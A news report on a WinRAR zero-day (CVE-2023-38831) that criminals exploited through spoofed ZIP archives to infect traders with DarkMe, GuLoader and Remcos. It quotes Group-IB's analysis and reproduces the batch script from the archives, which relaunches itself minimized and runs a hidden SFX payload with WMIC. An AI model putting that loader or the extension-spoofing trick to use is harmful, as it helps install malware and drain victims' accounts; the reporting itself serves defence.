A newly discovered zero-day in the widely used WinRAR
file-compression program has been exploited for four months by
unknown attackers who are using it to install malware when targets
open booby-trapped JPGs and other innocuous inside file
archives.
The vulnerability, residing in the way WinRAR processes the ZIP
file format, has been under active exploit since April in
securities trading forums, researchers from security firm Group IB
reported
Wednesday[1]. The attackers have been
using the vulnerability to remotely execute code that installs
malware from families, including DarkMe, GuLoader, and Remcos
RAT.
From there, the criminals withdraw money from broker accounts.
The total amount of financial losses and total number of victims
infected is unknown, although Group-IB said it has tracked at least
130 individuals known to have been compromised. WinRAR developers
fixed the vulnerability, tracked as CVE-2023-38831, earlier this
month.
Weaponizing ZIP archives
“By exploiting a vulnerability within this program, threat
actors were able to craft ZIP archives that serve as carriers for
various malware families,” Group-IB Malware Analyst Andrey
Polovinkin wrote. “Weaponized ZIP archives were distributed on
trading forums. Once extracted and executed, the malware allows
threat actors to withdraw money from broker accounts. This
vulnerability has been exploited since April 2023.”
While Group-IB hasn’t detected the vulnerability being exploited in
other settings or installing other malware families, it wouldn’t be
surprising if that’s the case. In 2019, a similar WinRAR
vulnerability tracked as CVE-2018-20250came
under active attack[2]within weeks ofbecoming
public[3]. It was used in no fewer
thanfive
separate campaigns[4]by separate threat
actors.
WinRAR has more than 500 million users who rely on the program
to compress large files to make them more manageable and quicker to
upload and download. It’s not uncommon for people to immediately
decompress the resulting ZIP files without inspecting them first.
Even when people attempt to examine them for malice, antivirus
software often has trouble peering into the compressed data to
identify malicious code.
The malicious ZIP archives Group-IB found were posted on public
forums used by traders to swap information and discuss topics
related to cryptocurrencies and other securities. In most cases,
the malicious ZIPs were attached to forum posts. In other cases,
they were distributed on the file storage site catbox[.]moe.
Group-IB identified eight popular trading forums used to spread the
files.
In one case, administrators of one of the abused forums warned
users after discovering harmful files were distributed on the
platform.
“Despite this warning, further posts were made and more users
were affected,” Polovinkin wrote. “Our researchers also saw
evidence that the threat actors were able to unblock accounts that
were disabled by forum administrators to continue spreading
malicious files, whether by posting in threads or sending private
messages." The images below show some of the postings used to
entice people into downloading them and a warning issued by an
admin of one of the abused forums.
A post made by the threat actor.
Another example.
A third.
One more.
Admin warning of the malicious ZIP file.
One forum participant reported that the attackers gained
unauthorized access to a broker account. An attempted withdrawal of
funds failed for reasons that aren’t entirely clear.
Intricate infection chain
The attackers’ exploit launched an intricate infection chain
illustrated below:
Polovinkin wrote:
The cybercriminals are exploiting a vulnerability that allows
them to spoof file extensions, which means that they are able to
hide the launch of malicious code within an archive masquerading as
a ‘.jpg’, ‘.txt’, or any other file format. They create a ZIP
archive containing both malicious and non-malicious files. When the
victim opens a specially crafted archive, the victim will usually
see an image file and a folder with the same name as the image
file.
Screenshot showing archive contents,
including a .jpg file.
If the victim clicks on the decoy file, which can masquerade as
an image, a script is executed that launches the next stage of the
attack. This process is illustrated in Figure 10 (below).
Figure 10
During our investigation, we noticed that the ZIP archive has a
modified file structure. There are two files in the archive: a
picture and a script. Instead of the image opening, the script is
launched. The script’s main purpose is to initiate the next stage
of the attack. This is done by running a minimized window of
itself. It then searches for two specific files, namely
“Screenshot_05-04-2023.jpg” and “Images.ico.” The JPG file is an
image that the victim opened initially. “Images.ico” is an SFX CAB
archive designed to extract and launch new files. Below is an
example of the script:
@echo off
if not DEFINED IS_MINIMIZED
set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* &&
exit
cd %TEMP%
for /F "delims=" %%K in ('dir /b /s "Screenshot_05-04-2023.jpg"')
do
for /F "delims=" %%G in ('dir /b /s "Images.ico"') do
WMIC process call create "%%~G" && "%%~K" && cd %CD% &&
exit
exit
Now that the vulnerability has become widely known, it will
likely become widely exploited. Anyone using WinRAR should update
to version 6.23[5] before using the program
again.
